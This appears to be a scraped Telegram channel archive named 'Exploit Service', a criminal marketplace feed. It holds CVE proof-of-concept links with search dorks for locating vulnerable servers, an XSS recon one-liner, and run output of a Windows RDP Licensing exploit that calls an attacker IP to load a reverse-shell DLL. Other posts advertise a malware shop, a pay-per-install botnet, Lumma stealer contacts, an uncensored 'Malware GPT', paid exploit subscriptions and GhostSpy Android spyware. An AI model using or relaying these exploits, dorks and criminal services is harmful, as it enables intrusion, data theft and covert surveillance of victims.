ar
Feedback
Exploit Service

Exploit Service

قناة بسيطة

Exploit Service | BlackHat ZERO DAY'S EXPLOITS Everything is published for informational purposes only. Link: @exploitservice Private: @ExploitServiceBot Exploit Developers: @ExploitDevs All Projects: @MalwareLinks Escrow: @MalwareEscrow

إظهار المزيد
8 675
المشتركون
لا توجد بيانات24 ساعات
-497 أيام
-20030 أيام
أرشيف المشاركات
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
Project: @ExploitService Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks

Bypass-Four03 is a powerful bash tool designed to help testers bypass HTTP 403 forbidden errors through various path and head
Bypass-Four03 is a powerful bash tool designed to help testers bypass HTTP 403 forbidden errors through various path and header manipulation techniques. It also includes fuzzing for HTTP methods and protocol versions, making it a versatile addition to any web security researcher's toolkit. https://github.com/nazmul-ethi/Bypass-Four03 Project: @ExploitService Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks

Launch of the new Malware GPT project Follow the news: t.me/MalwareGPT
and also the folder has been updated https://t.me/addlist/dvHVtK0vSIRhNjM0

Repost from Malware GPT
Launch Date: TODAY WITHIN 2 HOURS WITH A LIVE DEMO VIDEO IF YOU WANT TO SEE ANY PROMPTS IN THE VIDEO SEND THEM TO @MalwareGPT
Launch Date: TODAY WITHIN 2 HOURS WITH A LIVE DEMO VIDEO IF YOU WANT TO SEE ANY PROMPTS IN THE VIDEO SEND THEM TO @MalwareGPT_Support Malware GPT V1 own development without censorship Link: @MalwareGPT All Projects: @MalwareLinks

CVE-2024-38812, -38813: Two vulnerabilities in VMware vCenter, 7.5 - 9.8 rating Heap overflow and privilege escalation vulns
CVE-2024-38812, -38813: Two vulnerabilities in VMware vCenter, 7.5 - 9.8 rating Heap overflow and privilege escalation vulns on unpatched servers allow attackers to easily perform RCE using a specially crafted network packet. Link: https://nt.ls/44tRg Dork: http.title:"ID_VC_Welcome" OR certificate.issuer.domain_component:"vsphere" Vendor's advisory: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968 Project: @ExploitService Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks

PALPATINE INSTALL BOT ⚡️ SERVICE INSTALLS 🖥️ 7 streams, the price is for 1000 installations 🌏 Mix World - 130$ (Average qua
PALPATINE INSTALL BOT ⚡️ SERVICE INSTALLS 🖥️ 7 streams, the price is for 1000 installations 🌏 Mix World - 130$ (Average quality) 🇪🇺 EU - 630$ (min 500 install) 🇺🇸USA - 2100$ (min 300 install) 🌏 MIX WORLD UNIQUE + Т1 - 1450$ (rtb advertising) (min 1000 install) 🇪🇺 EU UNIQUE - 3600 (min 500 install) 🇺🇸USA UNIQUE - 9500$ install (min 100 install) 🇨🇦Canada - 10200$ (min 100 install) ⚙️Telegram Bot: @PALPATINEINSTALL_BOT 💬Support: @seevpalpadin 📰Channel: https://t.me/sheevpalpatineinstalls ☑️Reviews: https://zelenka.guru/threads/2096719/ https://forum.exploit.in/topic/234699/ https://coockie.pro/threads/servis-prodazhi-installov-services-install-mix-eu-usa.2500/ https://bhf.ee/threads/643449/

CVE-2024-23692:Unauthenticated RCE Flaw in Rejetto HTTP File Server New PoC:https://github.com/verylazytech/CVE-2024-23692 Do
CVE-2024-23692:Unauthenticated RCE Flaw in Rejetto HTTP File Server New PoC:https://github.com/verylazytech/CVE-2024-23692 Dork: HUNTER: web.body="HttpFileServer"&&header.server=="HFS 2.3m" Project: @ExploitService Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks

❗️В связи с участившимися блокировками в Telegram и недавнему сносу канала Meduza Corp, а также риском блокировки аккаунта, сохраняйте наши контакты в Tox, Session и Jabber, где вы можете связаться с нами: 📞New Telegram channel: @MeduzaNewz 📞Support: @meduzza_support 📞Jabber: meduza@jabbim.com 📞Tox: 3BD363B76536440EB9019BCAC61200579D94CD2301F15C43F8FFBF06C3CE1F3A45CA30C87ED8 📞Session: 0588da0bfbf37b2345e8fcf4fb5c183268cfbe13b2b61e1ba34a30c1362425ea7c

Sekai Ctf Windows Kernel вызов Process Flipper https://nu1lptr0.github.io/2024/10/10/windows-kernel-challenge-process-flipper.html Project: @ExploitService Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks

#exploit 1. CVE-2024-20404: Cisco Finesse Web-Based Management Interface XSS/SSRF https://github.com/AbdElRahmanEzzat1995/CVE
#exploit 1. CVE-2024-20404: Cisco Finesse Web-Based Management Interface XSS/SSRF https://github.com/AbdElRahmanEzzat1995/CVE-2024-20404 2. CVE-2024-30052: Exploiting Visual Studio via dump files https://ynwarcs.github.io/exploiting-vs-dump-files 3. CVE-2024-20353: Cisco IOS XE DoS https://github.com/codeb0ss/CVE-2024-20353-PoC Project: @ExploitService Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks

RU 🇷🇺 Внимание! Public Telegram канал и чат нашего сервиса были заблокированы. Актуальные линки: Канал - t.me/LummaReborn Ч
RU 🇷🇺 Внимание! Public Telegram канал и чат нашего сервиса были заблокированы. Актуальные линки: Канал - t.me/LummaReborn Чат - t.me/LummaTeam_Reborn Селлер - t.me/lummaseller127 Багс - t.me/lummanowork Маркет - t.me/lummamarketbot EN 🇬🇧 Attention! Public Telegram channel and chat of our service were blocked. Actual links: Channel - t.me/LummaReborn Chat - t.me/LummaTeam_Reborn Seller - t.me/lummaseller127 Bugs - t.me/lummanowork Market - t.me/lummamarketbot

#CVE Repository Hunt https://github.com/blackhuntop/Ghost-Cve Project: @ExploitService Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks

all python3 CVE-2024-38077-EXP.py --evil_ip 103xxxx --evil_dll_path \1\reverse-shell.dll --target_ip 1xxx -------------------------------------------------------------------------------- MadLicense: Windows Remote Desktop Licensing Service Preauth RCE target_ip: 1xxx evil_ip: 1xxxxx evil_dll_path: \\10xxx1reverse-shell.dll check_vuln_exist: False -------------------------------------------------------------------------------- [*] Run exploit script for 1 / 3 times [+] Get Server version: 0x60000a04 [-] Crashed, waiting for the service to restart, need 210 seconds...

#CVE-2024-38077 #Windows Remote Desktop Licensing(#RDL)Service https://github.com/CloudCrowSec001/CVE-2024-38077-POC Project: @ExploitService Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks

#WordPress #GiveWP POP to RCE (#CVE-2024-5932 CVSS 10) The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.14.1 via deserialization of untrusted input from the 'give_title' parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. The additional presence of a POP chain allows attackers to execute code remotely, and to delete arbitrary files. POC: https://github.com/EQSTSeminar/CVE-2024-5932 Search Query: HUNTER: web.body="/wp-content/plugins/give" Project: @ExploitService Private: @ExploitServiceBot Malware Shop: @MalwareShopBot All projects @MalwareLinks

Private channel from @ExploitService (@ExploitAlert) By subscribing, you get access to the private channel where you will find: - Exploit packs - Manuals and courses on exploit development - Daily publications of new vulnerabilities and instructions on how to use them - Macros - Silent vulnerabilities for PDF, DOC, XLS, PPT Office - Multi-exploit builder - SS7 attacks - Modified and custom versions, POC - Exploit development for Windows, Linux, and more - Binary exploits with Python - Daily video demonstrations on exploiting new vulnerabilities - And much more interesting and useful for exploiting vulnerabilities Subscription cost to the private channel: - Weekly: $649 - Monthly: $1299 - Lifetime: $1990 Accepted cryptocurrencies: Bitcoin, Ethereum, Litecoin, Monero, Dash, Zcash, and Tether USDT (bep20, trc20, erc20, ton). You can gain access to the private channel through the bot @ExploitServiceBot

👻 GhostSpy Android Web Control Key Features: • Remote screen and precise command control (Skeleton Control) • Live & offline keylogger for tracking keystrokes • Privacy mode with a black screen for discreet monitoring • Access photo gallery, SMS, call logs, contacts, and installed apps • Remote file manager and real-time location tracking • You can find a full description of the functions here Special Features: • Resistant to removal, undetectable by Play Protect • Automatic permissions setup Compatibility: Android 8–15 Easy Control: Accessible from any device with a browser No Setup Required: Register and start instantly Daily Updates: Request new features anytime Channel with updates: t.me/brazillianspy Pricing policy: t.me/brazillianspy/101 Contact: @ghostspyvip Ready to cooperate with any reputable escrow service including @MalwareEscrow